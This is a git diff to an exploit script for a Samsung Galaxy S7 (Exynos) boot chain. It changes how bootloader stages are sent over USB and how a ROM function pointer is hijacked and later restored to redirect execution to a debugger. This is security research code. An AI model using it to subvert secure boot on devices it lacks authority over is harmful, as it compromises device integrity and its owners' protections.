diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py index 52fdafc..f544685 100644 --- a/source/exploit/exploit.py +++ b/source/exploit/exploit.py @@ -597,38 +597,34 @@ class ExynosDevice(): # Send boot stage 1 self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read()) - # self.send_normal_stage(open("../S7/bl1.bin", "rb").read()) - assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger" - auth_bl1(DEBUGGER_ADDR) - - self.usb_write(b"FLSH") # Flush cache - # hijack rom recovery - # self.relocate_debugger() - # DEBUGGER_ADDR = 0x020c0000 - self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR)) # Rom recovery - self.cd.memwrite_region(0x02020f60, p64(DEBUGGER_ADDR)) - + # BL1 is loaded, now authenticat and patch it + auth_bl1(DEBUGGER_ADDR) + self.usb_write(b"FLSH") # Flush cache + hijacked_fun = u32(self.cd.memdump_region(0x020200dc, 4)) + self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR)) # hijack ROM_DOWNLOAD_USB for BL31 jump_bl1(DEBUGGER_ADDR) + + + + # At this point BL1 has booted. Next up is BL31 + assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger" + self.cd.memwrite_region(0x020200dc, p32(hijacked_fun)) # To continue booting next stages + self.cd.restore_stack_and_jump(hijacked_fun) time.sleep(2) self.connect_device() - # After booting bl1, back in debugger. - self.usb_read(0x200) # GiAs - self.cd.memwrite_region(0x02020f60, hijacked_usb_ra) - - # Load bl31 - self.cd.restore_stack_and_jump(0x00006590) - # self.usb_read(0x200) # GiAs - self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read()) - time.sleep(1) + time.sleep(2) self.connect_device() + time.sleep(1) ### WORKS UNTIL HERE. Unsure where we are in BL31 currently # Load BL3 + # self.usb_read(0x200) # GiAs + # self.cd.restore_stack_and_jump(hijacked_fun) self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read()) time.sleep(2) self.connect_device()